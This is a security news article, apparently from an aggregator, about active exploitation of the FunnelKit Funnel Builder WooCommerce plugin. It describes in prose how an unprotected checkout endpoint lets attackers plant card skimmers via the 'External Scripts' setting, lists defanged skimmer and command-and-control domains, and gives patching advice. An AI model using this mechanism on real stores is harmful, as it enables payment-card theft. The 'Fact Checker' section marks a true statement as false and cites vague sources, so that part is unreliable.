FunnelKit Vulnerability Under Active Exploitation Puts 40,000 WooCommerce Stores at Risk

Listen to this Post

Featured ImageA Critical WooCommerce Plugin Flaw Is Fueling Silent Payment Theft

A dangerous security vulnerability affecting thousands of WooCommerce stores has triggered a major cybersecurity alarm across the ecommerce industry. Attackers are actively exploiting a flaw in the popular Funnel Builder plugin by FunnelKit, silently injecting malicious payment skimming code into online checkout pages. The campaign is already underway, and security researchers warn that more than 40,000 online storefronts may be exposed.

What makes this attack particularly alarming is its stealth. The malicious scripts are cleverly disguised as legitimate analytics or marketing tools, making them extremely difficult for store owners to detect during routine inspections. Customers continue shopping normally while their sensitive payment details are secretly harvested in the background.

The vulnerability affects all Funnel Builder plugin versions prior to 3.15.0.3. According to researchers at Sansec, the flaw allows unauthenticated attackers to remotely inject arbitrary JavaScript into checkout pages without needing administrative access. This creates a direct pathway for cybercriminals to deploy persistent payment skimmers capable of stealing credit card information from unsuspecting buyers.

The root of the issue lies in a publicly accessible checkout endpoint built into the Funnel Builder plugin. This endpoint was designed to process incoming requests and execute internal plugin methods. However, older versions failed to properly verify user permissions or restrict which internal functions could be called remotely.

Because of these missing authorization checks, attackers can directly invoke a sensitive internal method responsible for modifying the plugin’s global settings. One of those settings, labeled “External Scripts,” automatically inserts custom JavaScript code into every checkout page across the website.

Cybercriminals quickly realized they could abuse this functionality to implant malicious scripts that persist across the entire ecommerce store. Once injected, the skimmer silently monitors customer activity during checkout and captures payment information in real time.

Researchers discovered that attackers are disguising their payloads as fake Google Tag Manager or analytics scripts. To administrators reviewing the site configuration, the malicious code appears harmless and blends naturally beside legitimate tracking tools already present on the store.

Behind the scenes, however, these scripts load sophisticated payment skimmers from attacker-controlled infrastructure. The malware establishes hidden communication channels using WebSocket connections, allowing attackers to exfiltrate stolen payment data without immediately triggering suspicion.

Security analysts identified multiple indicators of compromise connected to the campaign. One malicious script source was linked to the domain:

analytics-reports[.]com/wss/jquery-lib.js

Researchers also observed communication with the following command-and-control endpoint:

wss://protect-wss[.]com/ws

The domains have been intentionally defanged to prevent accidental interaction or execution.

FunnelKit has since released a patched version of the plugin addressing the vulnerability. The update introduces strict capability checks and restricts access to only approved internal methods, effectively closing the exploit path abused by attackers.

Store owners are being strongly urged to update immediately to Funnel Builder version 3.15.0.3 or later through the WordPress dashboard. However, patching alone may not fully eliminate the risk if a store has already been compromised before the update was applied.

Security experts recommend manually reviewing the plugin’s “External Scripts” configuration for suspicious entries or unfamiliar JavaScript snippets. Administrators should also perform full malware scans on their ecommerce environments to identify hidden backdoors, rogue administrator accounts, or additional persistence mechanisms left behind by attackers.

The incident highlights a growing trend in ecommerce-focused cybercrime, where attackers increasingly target plugins and third-party extensions instead of directly attacking payment gateways themselves. Since plugins often handle sensitive checkout logic, even a single overlooked security weakness can expose thousands of businesses simultaneously.

For many online retailers, the biggest damage may not come from direct financial losses but from the erosion of customer trust. A single payment skimming incident can permanently damage a brand’s reputation, trigger regulatory investigations, and result in chargebacks or legal consequences.

As WooCommerce continues powering millions of ecommerce sites worldwide, plugin security has become one of the most critical elements of modern online business protection. The FunnelKit incident serves as another reminder that even widely trusted plugins can become dangerous attack vectors if security controls are not rigorously enforced.

What Undercode Say:

The FunnelKit compromise demonstrates how modern ecommerce attacks are evolving from noisy intrusions into highly stealthy supply-chain style operations. Instead of breaching servers directly, attackers are now abusing trusted plugins already embedded deeply within checkout infrastructure.

This specific attack is particularly dangerous because it weaponizes legitimate functionality rather than exploiting traditional remote code execution. The “External Scripts” feature was originally intended for marketing integrations and analytics customization. Attackers simply turned that convenience feature into a malware delivery mechanism.

That approach significantly lowers detection rates.

Most administrators expect to see scripts from analytics platforms, ad networks, and tag managers inside checkout pages. Because the malicious payload imitates common marketing code patterns, many security reviews may overlook the infection entirely.

Another major concern is persistence.

Unlike temporary injections that disappear after cache clears or plugin reloads, these skimmers are stored directly inside plugin configuration settings. That means the malicious code survives restarts, theme updates, and in some cases even partial security cleanups.

The vulnerability also highlights a recurring weakness within WordPress ecosystems: insecure AJAX endpoints and missing capability validation. Developers frequently create flexible backend functions for convenience but forget to properly restrict who can execute them.

Attackers actively scan the internet for these exact mistakes.

Once proof-of-concept exploit details become public, mass exploitation typically follows within hours. Automated botnets can compromise thousands of vulnerable ecommerce sites rapidly, especially when plugins are widely installed.

The financial motivation behind payment skimming campaigns is enormous. Stolen credit card data remains one of the most profitable commodities on underground markets. A single compromised store processing hundreds of daily transactions can generate valuable datasets for fraud operations.

This attack also reflects the growing professionalization of cybercrime groups targeting ecommerce environments. The use of WebSocket infrastructure, disguised analytics scripts, and persistent injection methods suggests a mature operation rather than amateur opportunistic hacking.

One overlooked aspect is incident response difficulty.

Even after updating the vulnerable plugin, many businesses may falsely assume they are secure. In reality, attackers may already have planted secondary backdoors elsewhere within the WordPress installation. Without a comprehensive forensic review, infections can remain active for weeks or months.

Another important issue is third-party plugin dependency sprawl.

Many WooCommerce stores rely on dozens of extensions simultaneously. Each additional plugin increases the attack surface dramatically. A single vulnerable extension can undermine the security posture of the entire ecommerce environment.

Organizations should adopt stricter plugin governance policies, including:

Minimizing unnecessary extensions

Removing abandoned plugins

Monitoring plugin update frequency

Conducting regular code audits

Enforcing Web Application Firewall protections

Deploying Content Security Policies where possible

Real-time file integrity monitoring should also become standard practice for ecommerce operators. Detecting unauthorized script injections early can significantly reduce exposure time.

This incident may also increase pressure on WordPress plugin developers to implement secure-by-default coding practices. Features capable of injecting frontend scripts should require stronger validation layers and explicit administrative authorization.

From a broader cybersecurity perspective, the attack reinforces a harsh reality: ecommerce websites are no longer just retail platforms. They are financial infrastructure handling sensitive payment ecosystems, and attackers treat them accordingly.

The most dangerous vulnerabilities today are often the quietest ones.

No ransomware banner appears.

No visible outage occurs.

The store continues operating normally while customer payment information is siphoned silently in the background.

That stealth is precisely what makes these skimming campaigns so effective and so financially devastating.

Fact Checker Results

✅ Funnel Builder by FunnelKit versions prior to 3.15.0.3 were reported as vulnerable to unauthorized script injection attacks.

✅ Security researchers confirmed active exploitation involving fake analytics or Google Tag Manager style scripts used to deploy payment skimmers.

❌ Updating the plugin alone does not guarantee full remediation if attackers already implanted secondary malware or persistence mechanisms before patching.

Prediction

🔮 Ecommerce-focused attacks against WordPress plugins will continue increasing as attackers prioritize scalable targets with direct access to payment flows.

🔮 Future skimming campaigns will likely become even harder to detect by using AI-generated obfuscation and legitimate cloud-hosted infrastructure.

🔮 Security monitoring for WooCommerce environments may soon shift toward behavior-based detection rather than relying only on traditional malware signatures.

🕵️‍📝Let’s dive deep and fact‑check.

References:

Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.reddit.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2
Bing

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon